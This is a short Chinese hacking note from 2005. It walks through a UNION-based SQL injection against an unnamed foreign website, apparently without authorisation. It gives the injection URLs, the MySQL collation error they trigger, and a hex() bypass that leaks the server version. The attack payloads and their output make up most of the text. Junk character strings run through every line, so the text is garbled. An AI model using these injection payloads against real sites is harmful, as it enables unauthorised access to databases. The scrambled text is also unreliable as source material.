本文作者:SuperHei# l( d$ V' h! U) r0 [7 w6 X
文章性质:原创- P3 s! m3 E$ n$ {* q2 E A
发布日期:2005-10-18
# W* x; t/ ]- a1 r测试个国外的站时:
! b2 U z6 a: |. v& d/ lurl:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*% p. {: q0 K3 A7 R) x# t( x
返回错误:' v- o4 C# G7 h; E+ _
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
+ ~3 p& r/ B) E5 R* ~MySQL Error No. 126& B0 J/ _; \5 o1 M' s# i
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。* o6 D' G& m- I3 i4 t$ p
解决办法:转为其他编码如hex。
5 {: K1 q4 l& }5 {url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*8 p y+ o$ y/ C3 Z, Q3 e5 i+ k
成功得到hex(version())的值为:
- j8 k# w8 Z% h( a n* T342E312E332D62657461
& q: S. @* G1 d; ?. l6 ~" y# p5 ]9 A回Mysql查询下得到:
9 I1 g, A% e. A) R5 lmysql> select 0x342E312E332D62657461;& {2 T5 h9 c D0 Q7 r$ j. u
+------------------------+4 A. e( A2 o$ m! X( H" j: }
| 0x342E312E332D62657461 |' v% P0 H0 _- P3 c
+------------------------+
+ `4 B2 V% d) ~4 F3 n/ P$ R7 k| 4.1.3-beta |
. k; u+ E8 ~# F1 I+------------------------+
' U4 i% u9 I& J* T$ x1 row in set (0.00 sec); K5 ~$ `( S3 D. W) E4 ?
% G; X* S" O7 u. q8 y$ b |